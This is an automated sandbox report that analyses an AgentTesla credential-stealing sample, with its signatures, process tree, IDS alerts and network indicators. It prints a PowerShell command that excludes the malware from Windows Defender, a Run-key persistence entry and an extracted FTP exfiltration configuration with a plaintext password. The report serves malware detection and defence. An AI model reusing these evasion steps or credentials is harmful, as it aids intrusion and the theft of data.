Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
iNFGd6bDZX.exe

Overview

General Information

Sample name:iNFGd6bDZX.exe
renamed because original name is a hash value
Original sample name:9802175dc78cef260413c05623704f267eaa8184d8d6bcb68e15e82de4ee696e.exe
Analysis ID:1588699
MD5:8fbffb8434e574ea1bb6865da7af4c8d
SHA1:557bac80418049b3c97821a2b60bb3928211a644
SHA256:9802175dc78cef260413c05623704f267eaa8184d8d6bcb68e15e82de4ee696e
Tags:AgentTeslaexeuser-adrian__luca
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • iNFGd6bDZX.exe (PID: 7352 cmdline: "C:\Users\user\Desktop\iNFGd6bDZX.exe" MD5: 8FBFFB8434E574EA1BB6865DA7AF4C8D)
    • powershell.exe (PID: 7540 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7780 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • iNFGd6bDZX.exe (PID: 7552 cmdline: "C:\Users\user\Desktop\iNFGd6bDZX.exe" MD5: 8FBFFB8434E574EA1BB6865DA7AF4C8D)
    • iNFGd6bDZX.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\iNFGd6bDZX.exe" MD5: 8FBFFB8434E574EA1BB6865DA7AF4C8D)
  • newapp.exe (PID: 7984 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 8FBFFB8434E574EA1BB6865DA7AF4C8D)
    • newapp.exe (PID: 8040 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 8FBFFB8434E574EA1BB6865DA7AF4C8D)
    • newapp.exe (PID: 8048 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 8FBFFB8434E574EA1BB6865DA7AF4C8D)
    • newapp.exe (PID: 8056 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 8FBFFB8434E574EA1BB6865DA7AF4C8D)
  • newapp.exe (PID: 2032 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 8FBFFB8434E574EA1BB6865DA7AF4C8D)
    • newapp.exe (PID: 7296 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 8FBFFB8434E574EA1BB6865DA7AF4C8D)
    • newapp.exe (PID: 4192 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: 8FBFFB8434E574EA1BB6865DA7AF4C8D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.ercolina-usa.com", "Username": "ben@ercolina-usa.com", "Password": "nXe0M~WkW&nJ"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000E.00000002.2925773285.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000A.00000002.2927028894.0000000002B7C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000007.00000002.1840585657.0000000004E6E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000007.00000002.1840585657.0000000004E6E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000005.00000002.2927556251.000000000340C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 28 entries
              SourceRuleDescriptionAuthorStrings
              10.2.newapp.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                10.2.newapp.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  10.2.newapp.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x359dc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x35a4e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x35ad8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x35b6a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x35bd4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x35c46:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x35cdc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x35d6c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  7.2.newapp.exe.4eefd48.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    7.2.newapp.exe.4eefd48.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 38 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\iNFGd6bDZX.exe", ParentImage: C:\Users\user\Desktop\iNFGd6bDZX.exe, ParentProcessId: 7352, ParentProcessName: iNFGd6bDZX.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe", ProcessId: 7540, ProcessName: powershell.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\newapp\newapp.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\iNFGd6bDZX.exe, ProcessId: 7568, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\newapp
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\iNFGd6bDZX.exe", ParentImage: C:\Users\user\Desktop\iNFGd6bDZX.exe, ParentProcessId: 7352, ParentProcessName: iNFGd6bDZX.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe", ProcessId: 7540, ProcessName: powershell.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\iNFGd6bDZX.exe", ParentImage: C:\Users\user\Desktop\iNFGd6bDZX.exe, ParentProcessId: 7352, ParentProcessName: iNFGd6bDZX.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe", ProcessId: 7540, ProcessName: powershell.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-11T04:21:16.078441+010020299271A Network Trojan was detected192.168.2.449741192.254.225.13621TCP
                      2025-01-11T04:21:23.851673+010020299271A Network Trojan was detected192.168.2.449752192.254.225.13621TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-11T04:21:16.551813+010028555421A Network Trojan was detected192.168.2.449744192.254.225.13642249TCP
                      2025-01-11T04:21:16.559832+010028555421A Network Trojan was detected192.168.2.449744192.254.225.13642249TCP
                      2025-01-11T04:21:24.331495+010028555421A Network Trojan was detected192.168.2.449753192.254.225.13647402TCP
                      2025-01-11T04:21:24.336767+010028555421A Network Trojan was detected192.168.2.449753192.254.225.13647402TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-11T04:21:24.336767+010018000091A Network Trojan was detected192.168.2.449753192.254.225.13647402TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 7.2.newapp.exe.4e6ee90.4.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.ercolina-usa.com", "Username": "ben@ercolina-usa.com", "Password": "nXe0M~WkW&nJ"}
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeReversingLabs: Detection: 63%
                      Source: iNFGd6bDZX.exeVirustotal: Detection: 72%Perma Link
                      Source: iNFGd6bDZX.exeReversingLabs: Detection: 63%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeJoe Sandbox ML: detected
                      Source: iNFGd6bDZX.exeJoe Sandbox ML: detected
                      Source: iNFGd6bDZX.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49740 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49751 version: TLS 1.2
                      Source: iNFGd6bDZX.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeCode function: 4x nop then jmp 08EED532h0_2_08EED88D

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49744 -> 192.254.225.136:42249
                      Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49752 -> 192.254.225.136:21
                      Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49741 -> 192.254.225.136:21
                      Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49753 -> 192.254.225.136:47402
                      Source: Network trafficSuricata IDS: 1800009 - Severity 1 - Joe Security MALWARE AgentTesla - FTP Exfil Passwords : 192.168.2.4:49753 -> 192.254.225.136:47402
                      Source: Joe Sandbox ViewIP Address: 192.254.225.136 192.254.225.136
                      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownFTP traffic detected: 192.254.225.136:21 -> 192.168.2.4:49735 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.220-Local time is now 22:21. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.220-Local time is now 22:21. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 150 allowed.220-Local time is now 22:21. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: ftp.ercolina-usa.com
                      Source: iNFGd6bDZX.exe, 00000005.00000002.2927556251.000000000340C000.00000004.00000800.00020000.00000000.sdmp, iNFGd6bDZX.exe, 00000005.00000002.2927556251.000000000346B000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2927028894.0000000002B7C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000E.00000002.2925773285.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ercolina-usa.com
                      Source: iNFGd6bDZX.exe, 00000005.00000002.2927556251.000000000340C000.00000004.00000800.00020000.00000000.sdmp, iNFGd6bDZX.exe, 00000005.00000002.2927556251.000000000346B000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2927028894.0000000002B7C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000E.00000002.2925773285.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.ercolina-usa.com
                      Source: newapp.exe, 0000000C.00000002.1923055304.0000000002689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://localhost/arkanoid_server/requests.php
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1724879627.0000000002A05000.00000004.00000800.00020000.00000000.sdmp, iNFGd6bDZX.exe, 00000005.00000002.2927556251.0000000003391000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1837746080.0000000003695000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2927028894.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000C.00000002.1923055304.0000000002A28000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000E.00000002.2925773285.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1730538673.0000000008F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1726457785.0000000004221000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1840585657.0000000004E6E000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1840585657.0000000004EEF000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2918833865.0000000000436000.00000040.00000400.00020000.00000000.sdmp, newapp.exe, 0000000C.00000002.1939852793.000000000427F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1726457785.0000000004221000.00000004.00000800.00020000.00000000.sdmp, iNFGd6bDZX.exe, 00000005.00000002.2927556251.0000000003391000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1840585657.0000000004E6E000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000007.00000002.1840585657.0000000004EEF000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2927028894.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2918833865.0000000000436000.00000040.00000400.00020000.00000000.sdmp, newapp.exe, 0000000C.00000002.1939852793.000000000427F000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000E.00000002.2925773285.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: iNFGd6bDZX.exe, 00000005.00000002.2927556251.0000000003391000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2927028894.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000E.00000002.2925773285.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: iNFGd6bDZX.exe, 00000005.00000002.2927556251.0000000003391000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000A.00000002.2927028894.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000E.00000002.2925773285.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49740 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49751 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\iNFGd6bDZX.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\newapp\newapp.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\newapp\newapp.exe
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary

                      barindex
                      Source: 10.2.newapp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 7.2.newapp.exe.4eefd48.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 7.2.newapp.exe.4eefd48.3.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 12.2.newapp.exe.427fd00.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 12.2.newapp.exe.427fd00.8.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 0.2.iNFGd6bDZX.exe.425ef28.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.iNFGd6bDZX.exe.425ef28.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 7.2.newapp.exe.4e6ee90.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 7.2.newapp.exe.4e6ee90.4.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 0.2.iNFGd6bDZX.exe.4221d08.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.iNFGd6bDZX.exe.4221d08.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 7.2.newapp.exe.4e6ee90.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 7.2.newapp.exe.4e6ee90.4.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
